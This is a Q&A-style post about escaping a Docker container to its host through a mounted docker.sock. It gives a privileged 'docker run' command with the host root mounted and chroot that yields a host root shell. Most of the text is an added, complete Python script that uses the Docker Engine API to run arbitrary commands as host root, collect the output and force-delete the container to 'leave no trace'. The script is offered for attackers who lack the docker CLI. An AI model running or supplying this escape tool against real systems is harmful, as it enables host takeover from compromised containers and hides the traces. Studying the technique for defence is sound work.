How to execute a command directly on the host system through docker.sock in a Docker container?


I’ve been studying Docker security and examining ways of escaping from container to host.

Suppose the Docker socket (docker.sock) is mounted into the container at /var/run/docker.sock, so that the Docker client (docker) can send commands to the Docker daemon (dockerd).

To execute commands on the host, I could run another container and mount /etc/ into it (read-write) to schedule cron jobs; is it possible to mount /etc/ into the current container?

What other methods are there for executing commands on the host through docker.sock?


Method 1

The best way that I’ve found to execute commands on the underlying host with an exposed Docker socket is Ian Miell’s “most pointless docker command ever”.

The command looks like this:

    docker run -ti \
        --privileged \
        --net=host --pid=host --ipc=host \
        --volume /:/host \
        busybox \
        chroot /host

and will essentially drop you straight into a full root shell on the underlying host.

To break the command down:

--privileged removes the default Docker security layers such as AppArmor and capability restrictions.

--net=host --pid=host --ipc=host runs the process in the host’s namespaces instead of a separate set of namespaces for the contained process.

--volume /:/host mounts the host root filesystem as /host inside the container.

then

chroot /host as the command changes the root to that /host directory.

If you’re running via Kubernetes, you can use The most pointless Kubernetes command which effectively does the same thing (assuming the cluster doesn’t have a restrictive Pod Security Policy in place).
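The same technique driven through the Docker Engine API directly on the socket, as an added example that is not part of the original question or answer and is not Ian Miell’s code. It assumes the socket is mounted at /var/run/docker.sock, that the daemon already has the busybox image (the create call does not pull), and that the caller is allowed to create privileged containers. It creates a new container with the host root bound at /host (the API offers no way to add a bind mount to the container you are already running in, so the /etc/ trick also needs a fresh container), runs the command under chroot /host, and returns the host command’s exit code and output. Only the Python standard library is used, so it works in images where the docker binary is absent; the only thing the attacker needs is the socket.

```python
"""Drive the Docker Engine API over a mounted /var/run/docker.sock.

Added example, not code from the original post. Assumptions: the socket path
below, a local busybox image, and a daemon that accepts unversioned API paths
(all current engines do). No docker CLI is required.
"""
import http.client
import json
import socket
import struct

DOCKER_SOCK = "/var/run/docker.sock"   # assumption: where the socket is mounted


class UnixHTTPConnection(http.client.HTTPConnection):
    """HTTP/1.1 client that connects to a Unix domain socket instead of TCP."""

    def __init__(self, sock_path):
        super().__init__("localhost")      # Host header only; never resolved
        self.sock_path = sock_path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.sock_path)


def build_create_payload(command, image="busybox"):
    """Container spec equivalent to the 'most pointless docker command'.

    Host root bind-mounted at /host, privileged, and sharing the host's
    PID/net/IPC namespaces, so `chroot /host` runs `command` as host root.
    """
    return {
        "Image": image,
        "Cmd": ["chroot", "/host", "/bin/sh", "-c", command],
        "HostConfig": {
            "Binds": ["/:/host"],
            "Privileged": True,
            "PidMode": "host",
            "NetworkMode": "host",
            "IpcMode": "host",
        },
    }


def demux_logs(raw):
    """Split Docker's multiplexed (non-TTY) log stream into (stdout, stderr).

    Each frame is an 8-byte header (stream type: 1=stdout, 2=stderr; three
    reserved bytes; big-endian uint32 payload length) followed by the payload.
    """
    stdout, stderr = b"", b""
    offset = 0
    while offset + 8 <= len(raw):
        stream_type, size = struct.unpack(">BxxxI", raw[offset:offset + 8])
        payload = raw[offset + 8:offset + 8 + size]
        if stream_type == 2:
            stderr += payload
        else:
            stdout += payload
        offset += 8 + size
    return stdout, stderr


def api(sock_path, method, path, body=None):
    """One request against the Engine API; returns (status, response bytes)."""
    conn = UnixHTTPConnection(sock_path)
    try:
        headers = {"Content-Type": "application/json"} if body is not None else {}
        conn.request(method, path, body=json.dumps(body) if body is not None else None,
                     headers=headers)
        resp = conn.getresponse()
        data = resp.read()
    finally:
        conn.close()
    if resp.status >= 400:
        raise RuntimeError(f"{method} {path} -> {resp.status}: {data!r}")
    return resp.status, data


def run_on_host(command, sock_path=DOCKER_SOCK):
    """Create, start, wait for and remove a host-rooted container.

    Returns (exit_code, stdout, stderr) of `command` as executed on the host.
    """
    _, created = api(sock_path, "POST", "/containers/create", build_create_payload(command))
    cid = json.loads(created)["Id"]
    try:
        api(sock_path, "POST", f"/containers/{cid}/start")
        _, waited = api(sock_path, "POST", f"/containers/{cid}/wait")
        exit_code = json.loads(waited)["StatusCode"]
        _, raw = api(sock_path, "GET", f"/containers/{cid}/logs?stdout=1&stderr=1")
        out, err = demux_logs(raw)
    finally:
        api(sock_path, "DELETE", f"/containers/{cid}?force=1")   # leave no trace
    return exit_code, out.decode(errors="replace"), err.decode(errors="replace")


# Constructed sample of the log framing, so the decoder can be exercised offline.
SAMPLE_LOG_FRAMES = (b"\x01\x00\x00\x00\x00\x00\x00\x05hello"
                     b"\x02\x00\x00\x00\x00\x00\x00\x03err")

if __name__ == "__main__":
    print(demux_logs(SAMPLE_LOG_FRAMES))          # (b'hello', b'err')
    code, out, err = run_on_host("id; hostname; cat /etc/hostname")
    print(code, out, err)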

